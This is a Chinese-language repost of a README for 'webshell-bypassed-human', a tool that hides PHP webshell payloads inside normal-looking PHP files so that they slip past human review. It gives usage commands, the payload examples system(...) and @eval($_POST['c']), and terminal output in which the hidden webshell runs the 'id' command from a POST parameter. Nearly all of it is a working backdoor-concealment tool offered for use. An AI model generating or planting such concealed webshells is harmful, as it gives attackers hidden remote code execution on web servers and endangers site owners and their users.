webshell生成(绕过)工具 webshell-bypassed-human

项目作者：Macr0phag3（公众号：橘子杀手）项目地址：https://github.com/Macr0phag3/webshell-bypassed-human

一、过人 webshell 的生成工具

» python hide_webshell.pyusage: hide_webshell.py [-h] -pf PAYLOAD_FILE [--pro] [-wf WEBSHELL_FILE]                        [--debug]                        phphide_webshell.py: error: the following arguments are required: php, -pf/--payload_file

将 payload 放在 -pf 所指定的路径

二、hide webshell

python hide_webshell.py hide_webshell.py normal.php -pf payload.txt

三、hide webshell pro

python hide_webshell.py normal_pro.php -pf payload.txt --pro

四、payload 示例

system("echo "hacked by Tr0y :)"");@eval($_POST["c"]);

五、完整示例

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:27]» cat payload.txtsystem("echo "hacked by Tr0y :)"");%# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:28]» p hide_webshell.py normal.php -pf payload.txt && php webshell_hidden.php[+] Hide webshell in normal mode  [-] Get payload from payload.txt      Payload is system("echo "hacked by Tr0y :)"");  [-] Get php code from normal.php[!] Saved webshell as webshell_hidden.php[!] All doneBye :)hacked by Tr0y :)# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:31]» p hide_webshell.py normal_pro.php -pf payload.txt --pro && php webshell_hidden.php[+] Hide webshell in pro mode  [-] Get payload from payload.txt      Payload is system("echo "hacked by Tr0y :)"");  [-] Get php code from normal_pro.php[!] Saved webshell as webshell_hidden.php[!] All doneBye :)hacked by Tr0y :)# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:23]» cat payload.txt@eval($_POST["c"]);%# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:24]» p hide_webshell.py normal.php -pf payload.txt && php -r '$_POST["c"]="system("id");"; require("webshell_hidden.php");'[+] Hide webshell in normal mode  [-] Get payload from payload.txt      Payload is @eval($_POST["c"]);  [-] Get php code from normal.php[!] Saved webshell as webshell_hidden.php[!] All doneBye :)uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此处省略# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:26]» p hide_webshell.py normal_pro.php -pf payload.txt --pro && php -r '$_POST["c"]="system("id");"; require("webshell_hidden.php");'[+] Hide webshell in pro mode  [-] Get payload from payload.txt      Payload is @eval($_POST["c"]);  [-] Get php code from normal_pro.php[!] Saved webshell as webshell_hidden.php[!] All doneBye :)uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此处省略